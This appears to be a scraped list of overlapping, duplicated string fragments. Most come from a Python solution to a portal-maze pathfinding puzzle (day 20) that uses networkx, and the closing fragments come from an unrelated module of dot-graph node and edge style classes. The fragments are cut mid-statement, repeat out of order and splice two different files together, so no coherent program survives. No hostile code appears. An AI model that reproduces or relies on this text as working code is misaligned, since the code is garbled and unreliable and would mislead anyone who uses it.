1, path_length) return", "outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world,", "pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in", "if line[col - 1] == '.': world.add_edge((col, row), (col - 1, row)) if", "direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one',", "world) if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1])", "print(level) def search_paths(accessible, dlevel): paths = [] for pid, dst_pos in accessible.items(): if", "== pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if", "if path] return min(paths) if paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list,", "outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level,", "def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for portal_id in portal_list.keys():", "search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if", "2] == '.' else (col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj", "if solutions else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W,", "= search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list,", "len(lines[0]) height = len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path", "line[col + 1]].append((col + 2, row) if line[col + 2] == '.' else", "if level != 0 and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return", "row - 1) if lines[row - 1][col] == '.' else (col, row +", "for portal_id in portal_list.keys(): if portal_id == 'AA': continue for portal_pos in portal_list[portal_id]:", "current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths =", "portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x, y): return x ==", "accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for portal_id in portal_list.keys(): if", "or y == height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner =", "portal_id in portal_list.keys(): if portal_id == 'AA': continue for portal_pos in portal_list[portal_id]: if", "to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch: pos, level, path_length", "y): return x == 2 or y == 2 or x == width", "portal_list, world) if level == 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if", "1][col] == '.' else (col, row + 2)) return portals def portal_paths(portal_list, world):", "path] return min(paths) if paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world)", "if pid != 'ZZ']: current = accessible[pid] new_length = current_length + 1 +", "y == 2 or x == width - 4 or y == height", "for portal_pos in portal_list[portal_id]: if portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world,", "+ lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col] == '.'", "to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ'", "1][col] == '.': world.add_edge((col, row), (col, row - 1)) return world def search_portals(lines):", "acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in portal_list[portal_id] if", "if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif", "direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line): if", "accessible = acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id not in accessible accessible[portal_id]", "(col, row + 2)) return portals def portal_paths(portal_list, world): for portals in portal_list.values():", "== 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f:", "lines[row - 1][col] == '.': world.add_edge((col, row), (col, row - 1)) return world", "portals def portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals) == 1: continue", "acc_outer, acc_inner = {}, {} for portal_id in portal_list.keys(): if portal_id == 'AA':", "pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel):", "2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines = f.readlines() width = len(lines[0])", "return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in portal_list[portal_id]", "line[col + 2] == '.' else (col - 1, row)) elif lines[row +", "== 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level != 0 and", "world, history): print(level) def search_paths(accessible, dlevel): paths = [] for pid, dst_pos in", "== '.' else (col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj +", "else acc_inner assert portal_id not in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath:", "world.add_edge((col, row), (col - 1, row)) if lines[row - 1][col] == '.': world.add_edge((col,", "paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0", "+ 2, row) if line[col + 2] == '.' else (col - 1,", "paths if path] return min(paths) if paths else None acc_outer, acc_inner = accessible_portals(pos,", "print('part one', len(path) - 1) def is_outer(x, y): return x == 2 or", "open('day20.txt') as f: lines = f.readlines() width = len(lines[0]) height = len(lines) W", "4 or y == height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner", "col,obj in enumerate(line): if obj != '.': continue if line[col - 1] ==", "portals[1]) with open('day20.txt') as f: lines = f.readlines() width = len(lines[0]) height =", "level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1", "1 + current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch =", "search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length): for pid in", "portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path)", "dst_pos[0] + 1 if distance_to_goal else None) paths = [path for path in", "in paths if path] return min(paths) if paths else None acc_outer, acc_inner =", "acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner, 1) def", "W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W,", "- 1, path_length) return min(solutions) if solutions else None W = direct_paths(lines) #result", "[] while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list,", "= len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W,", "acc_outer: return acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found = search_paths(acc_outer, -1)", "3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for portal_id in", "if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible,", "to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch:", "in accessible.keys() if pid != 'ZZ']: current = accessible[pid] new_length = current_length +", "import sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for", "= f.readlines() width = len(lines[0]) height = len(lines) W = direct_paths(lines) portal_connections =", "+ 1, path_length) if level > 0 and acc_outer: add_branches(acc_outer, level - 1,", "portal_list[portal_id]: if portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible", "portal_pos in portal_list[portal_id]: if portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world, pos,", "level >= max_level: continue add_branches(acc_inner, level + 1, path_length) if level > 0", "pid != 'ZZ']: current = accessible[pid] new_length = current_length + 1 + current[0]", "history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None) paths", "level != 0 and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found", "- 1, row)) if lines[row - 1][col] == '.': world.add_edge((col, row), (col, row", "level == 0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level", "return x == 2 or y == 2 or x == width -", "+ 1][col]].append((col, row - 1) if lines[row - 1][col] == '.' else (col,", "enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha(): continue if line[col + 1].isalpha():", "row), (col, row - 1)) return world def search_portals(lines): portals = defaultdict(list) for", ">= max_level: continue add_branches(acc_inner, level + 1, path_length) if level > 0 and", "- 1][col] == '.' else (col, row + 2)) return portals def portal_paths(portal_list,", "and acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions) if solutions else None", "current_length + 1 + current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length))", "portal_list, max_level): def add_branches(accessible, new_level, current_length): for pid in [pid for pid in", "path_length) return min(solutions) if solutions else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0],", "assert portal_id not in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass return", "max_level): def add_branches(accessible, new_level, current_length): for pid in [pid for pid in accessible.keys()", "dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return", "[path for path in paths if path] return min(paths) if paths else None", "lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row - 1) if lines[row", "0 and acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions) if solutions else", "1, path_length) return min(solutions) if solutions else None W = direct_paths(lines) #result =", "if pid == 'ZZ' or (pid, dst_pos[1], level) in history: continue distance_to_goal =", "and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner, 1)", "nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id not", "max_level: continue add_branches(acc_inner, level + 1, path_length) if level > 0 and acc_outer:", "add_branches(accessible, new_level, current_length): for pid in [pid for pid in accessible.keys() if pid", "row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row - 1)", "None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ'", "level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list,", "= [] while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos,", "lines = f.readlines() width = len(lines[0]) height = len(lines) W = direct_paths(lines) portal_connections", "in [pid for pid in accessible.keys() if pid != 'ZZ']: current = accessible[pid]", "+ 2)) return portals def portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals)", "acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id not in accessible accessible[portal_id] = dst,", "1) if lines[row - 1][col] == '.' else (col, row + 2)) return", "acc_inner = {}, {} for portal_id in portal_list.keys(): if portal_id == 'AA': continue", "outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length): for", "pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id not in", "(pid, dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level +", "accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list,", "world) if level == 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level", "[] for pid, dst_pos in accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1],", "except nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for", "portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1) def", "acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in", "current = accessible[pid] new_length = current_length + 1 + current[0] new_pos = get_other_exit(portal_list,", "portal_id not in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer,", "level, path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level ==", "+ current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0],", "path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x, y):", "collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines):", "to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if", "level + 1, path_length) if level > 0 and acc_outer: add_branches(acc_outer, level -", "distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)]))", "pid in [pid for pid in accessible.keys() if pid != 'ZZ']: current =", "1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines", "portal_pos) accessible = acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id not in accessible", "width - 4 or y == height - 3 def accessible_portals(pos, portal_list, world):", "return min(paths) if paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if", "if level == 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level !=", "f.readlines() width = len(lines[0]) height = len(lines) W = direct_paths(lines) portal_connections = search_portals(lines)", "row,line in enumerate(lines): for col,obj in enumerate(line): if obj != '.': continue if", "dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel,", "portal_list.keys(): if portal_id == 'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos ==", "def add_branches(accessible, new_level, current_length): for pid in [pid for pid in accessible.keys() if", "portal_id == 'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos == pos: continue", "enumerate(lines): for col,obj in enumerate(line): if obj != '.': continue if line[col -", "len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0],", "enumerate(line): if obj != '.': continue if line[col - 1] == '.': world.add_edge((col,", "with open('day20.txt') as f: lines = f.readlines() width = len(lines[0]) height = len(lines)", "world): acc_outer, acc_inner = {}, {} for portal_id in portal_list.keys(): if portal_id ==", "= current_length + 1 + current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level,", "in enumerate(lines): for col,obj in enumerate(line): if obj != '.': continue if line[col", "dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] +", "= [] for pid, dst_pos in accessible.items(): if pid == 'ZZ' or (pid,", "accessible[pid] new_length = current_length + 1 + current[0] new_pos = get_other_exit(portal_list, pid, current[1])", "- 1] == '.': world.add_edge((col, row), (col - 1, row)) if lines[row -", "world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines = f.readlines() width = len(lines[0]) height", "dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal", "pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W, portal_connections, 100) print('part two', result)", "in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level)", "'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found =", "new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch: pos, level,", "sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines): for col,obj in", "if obj != '.': continue if line[col - 1] == '.': world.add_edge((col, row),", "[pid for pid in accessible.keys() if pid != 'ZZ']: current = accessible[pid] new_length", "in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level", "def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in portal_list[portal_id] if pos !=", "return portals def portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals) == 1:", "(col, row - 1)) return world def search_portals(lines): portals = defaultdict(list) for row,line", "paths = [path for path in paths if path] return min(paths) if paths", "history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid,", "else None) paths = [path for path in paths if path] return min(paths)", "return min(solutions) if solutions else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0,", "- 1)) return world def search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]):", "sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for row,line", "#result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W, portal_connections, 100) print('part", "W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x,", "pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length): for pid in [pid for pid", "!= 'ZZ']: current = accessible[pid] new_length = current_length + 1 + current[0] new_pos", "return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length): for pid", "len(path) - 1) def is_outer(x, y): return x == 2 or y ==", "+ 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row - 1) if lines[row -" ]
[ "Use of this source code is governed by the MIT license that can", "'18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def", "Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({", "of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def", "file. \"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "self.style = dict() for key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' }", ".dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self,", "appearance of a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research group,", "= { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle):", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs: self.style.extend(key, value)", "'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate", "return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs):", "self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production", "= { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0'", "a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape':", "found in the LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\"", "compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color':", "node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24'", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth': '2', 'arrowsize':", "INRA Use of this source code is governed by the MIT license that", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object):", "of key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a", "Faulon's research group, INRA Use of this source code is governed by the", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General", "node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green',", "= dict() for key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a", "'18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def", "a dictionnary of key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style", "'2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self,", "a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green',", "a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor':", "key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption", "'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle):", "'0' } class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs):", "'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs):", "'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self,", "license that can be found in the LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General", "dictionnary of key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for", "'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for", "this source code is governed by the MIT license that can be found", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class", "kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot", "attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs):", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' }", "edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth': '2',", "compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color':", "\"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle):", "for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "for key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of", "self.style = { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for", "super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle):", "for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape':", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth':", "dictionnary of key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for", ".dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def", "for setting the appearance of a dot file. Copyright (C) 2016-2017 <NAME>, JL", "intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle',", "class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "can be found in the LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class for", "value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\"", "class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "that can be found in the LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class", "key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key,", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2'", "'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\"", "self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\"", "'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction", "setting the appearance of a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class", "for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color':", "'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def", "for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color':", "by the MIT license that can be found in the LICENSE.txt file. \"\"\"", "\"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style", "chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green',", "\"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style =", "GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return self.style class", "}) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class", "of a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA", "is governed by the MIT license that can be found in the LICENSE.txt", "return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs):", "super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' })", "Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize':", "value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key, value", "\"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs: self.style.extend(key, value) def GetStyle(self):", "key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis", "'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self,", "group, INRA Use of this source code is governed by the MIT license", "file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use of this", "for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style", "governed by the MIT license that can be found in the LICENSE.txt file.", "class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style =", "'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth': '2', 'arrowsize': '2' }", "<NAME>, JL Faulon's research group, INRA Use of this source code is governed", "\"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" 